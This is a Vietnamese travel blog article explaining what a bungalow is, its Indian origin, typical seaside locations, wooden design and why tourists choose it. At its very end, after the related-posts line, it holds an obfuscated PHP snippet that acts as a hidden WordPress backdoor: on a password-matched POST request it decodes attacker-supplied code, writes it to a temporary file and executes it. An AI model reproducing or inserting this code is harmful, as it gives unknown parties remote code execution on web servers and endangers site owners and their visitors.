Bungalow là gì? Điểm nổi bật của mô hình Bungalow

Trong những năm gần đây, mô hình Bungalow đang là một trong những loại hình lưu trú được khách du lịch nghỉ dưỡng yêu thích và lựa chọn đến. Bởi loại hình lưu trú khá rẻ, các dịch vụ đi kèm khá hấp dẫn và bổ ích cho khách du lịch được gần gũi với thiên nhiên. Vậy mô hình lưu trú Bungalow là gì? Đặc điểm của Bungalow như thế nào? Mời các bạn cùng với Wiki Cách Làm cùng tìm hiểu một số thông tin hay sau đây.

Bungalow là gì?

Bungalow là gì? Điểm nổi bật của mô hình Bungalow-1

Bungalow được xem là một trong loại hình lưu trú dành cho khách du lịch nghỉ dưỡng lựa chọn trong thời gian gần đây. Bungalow được xây dụng theo mô hình nhà ở thiết kế 1 tầng có diện tích nhỏ, ngoài ra có mái hiên.

Nhìn về tổng quát, mô hình Bungalow khá giống với Homestay. Tuy nhiên bên trong loại hình Bungalow được trang trí hết sức đơn giản bằng những vật dụng thô sơ của người dân bản địa.

Trong những năm gần đây, loại hình lưu trú Bungalow ngày càng được khách du lịch nghỉ dưỡng lựa chọn. Bởi giá thành tương đối bình dân, tuy nhiên các dịch vụ đi kèm khá đầy đủ và tốt. Ngoài ra môi trường thiên nhiên của mô hình Bungalow khá ấn tượng, mang lại cảm thấy cho khách du lịch sống gần với thiên nhiên hơn.

Nguồn gốc của Bungalow

Tiền thân của Bungalow được gọi là Bangla. Thuật ngữ dùng để ngụ ý nói lên “một túp liều nhỏ” của người dân Ấn Độ. Mãi đến thế kỉ XIX, khi Ấn Độ trở thành thuộc địa của Anh Quốc, họ đã biến tấu túp liều Bangla thành Bungalow nhằm phục vụ nhu cầu của người dân Anh Quốc với thiết kế là một ngôi nhà nhỏ 1 tầng, có mái hiên, không gian mở khá thoáng mát.

Xem Thêm  Cách nuôi chim bạc má phát triển tốt

Sau đó, Anh và Mỹ đã biến tấu thuật ngữ Bungalow thành những ngôi nhà nhỏ được xây dựng và thiết kế cao cấp hơn bằng gỗ, diện tích rộng rãi, thoáng mát. Ngày này, mô hình lưu trú Bungalow được du nhập về Việt Nam và được rất nhiều du khách nghỉ dưỡng lựa chọn chính sự thoáng mát, được sống gần với thiên nhiên. Tuy nhiên thì theo văn hóa của vùng miền hay đất nước mà mô hình lưu trú Bungalow có sự khác biệt về thiết kế, trang trí,…

Điểm nổi bật của mô hình Bungalow

Bungalow là gì? Điểm nổi bật của mô hình Bungalow-2

– Vị trí xây dựng của mô hình lưu trú Bungalow

Thường loại hình lưu trú Bungalow được xây dựng ở vị trí ven biển bởi vị trí này đủ rộng lớn, thoáng mát và mang lại cảm giác gần gũi với thiên nhiên. Điển hình tại Việt Nam hiện nay xuất hiện nhiều Bungalow ở ven biển Nha Trang, Đà Nẵng, Phú Quốc. Đến với mô hình lưu trú Bungalow, khách du lịch sẽ cảm nhận không khí trong lành của thiên nhiên, với sóng biển.

– Kiến trúc và thiết kế của Bungalow

Điểm nổi bật của mô hình lưu trú Bungalow là phong cách đơn giản, thiết kế rất đơn sơ và mộc mạc mang lại cho du khách cảm giác được sống gần gũi với thiên nhiên, gió biển.

+ Thường Bungalow được xây dựng bằng vật liệu đơn sơ từ tre, nứa và gỗ. Tuy nhiên phần lớn Bungalow được xây dựng bằng gỗ, cách làm này sẽ giúp du khách trải nghiệm và có cuộc sống gần gũi và ấm ấp với thiên nhiên.

Xem Thêm  Hướng dẫn cách nuôi giống chó Newfoundland

Ngoài ra, có một số khu nghỉ dưỡng khác, chọn xây dựng Bungalow bằng gạch đá, xi măng,.. nhưng để tạo ấn tượng, người ta sẽ không tô tường mà giữ nguyên nét cơ bản về xây dựng.

+ Phần lớn diện tích mô hình lưu trú Bungalow từ 15m2 cho đến 120m2 tùy theo nhu cầu du khách ở bao nhiêu người mà khu nghỉ dưỡng sẽ cung cấp diện tích phù hợp.

+ Khuôn viên xung quanh của Bungalow thường có nét ấn tượng riêng. Tuy diện tích xây nhà ở Bungalow khá nhỏ nhưng khuôn viên khu đất xây dựng Bungalow khá rộng lớn.

Những bụi cây xanh, cây cảnh,… sẽ được thiết kế ấn tượng sao cho không bị che khuất tầm nhìn. Bên cạnh đó, khu nghỉ dưỡng còn thiết kế bên cạnh những ngôi nhà nhỏ Bungalow là hồ bơi, khu vui chơi giải trí,… nhằm tăng không gian sử dụng cho khách du lịch nghỉ dưỡng được thoải mái và vui vẻ.

+ Tuy diện tích túp liều Bungalow khá nhỏ nhưng điểm nổi bật chính là mái hiên. Phần mái hiên của mô hình lưu trú Bungalow khá thoáng mát, vị trí hướng gió thuận với thiên nhiên. Đây là một phần của túp liều Bungalow được tiện dụng để khách du lịch thư giãn, hòa mình với không khí của thiên nhiên.

+ Nội thất bên trong của Bungalow được trang bị đơn giản từ giường ngủ, nhà vệ sinh cho đến bếp ăn. Tùy theo mức độ, cấp hạng của Bungalow mà thiết bị nội thất bên trong Bungalow sẽ khác nhau, đầy đủ và sang trọng phụ thược vào cách lựa chọn mô hình lưu trú Bungalow.

Xem Thêm  Trang trí sinh nhật cho bé trai

Vì sao khách du lịch chọn mô hình lưu trú Bungalow

Bungalow là gì? Điểm nổi bật của mô hình Bungalow-3

– Giá thuê của loại hình lưu trú Bungalow không quá đắt đỏ.

– Bên cạnh đó, mô hình này cung cấp tương đối đầy đủ tiện ích, các dịch vụ đi kèm như khu vui chơi giải trí, …

– Vị trí xây dựng gần biển , khách du lịch có thể trải nghiệm và sống gần gũi với thiên nhiên.

– Không gian sống trong túp liều Bungalow khá thoải mái, thoáng mát với những đầy đủ thiết bị từ đơn sơ cho đến cao cấp.

Xem thêm: Condotel là gì?

Từ những thông tin hưu ích bên trên, chắc hẳn sẽ giúp bạn đọc hiểu rõ hơn về mô hình lưu trú Bungalow là gì? Điểm nổi bật của loại hình Bungalow như thế nào? Hi vọng thông qua nội dung bài viết này, bạn sẽ chọn cho mình loại hình lưu trú phù hợp nhất trong kỳ nghỉ dưỡng sắp tới. Đến với loại hình lưu trú Bungalow, bạn sẽ cảm nhận không khí trong lành, được sống gần với thiên nhiên.

Bài Liên Quan:

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}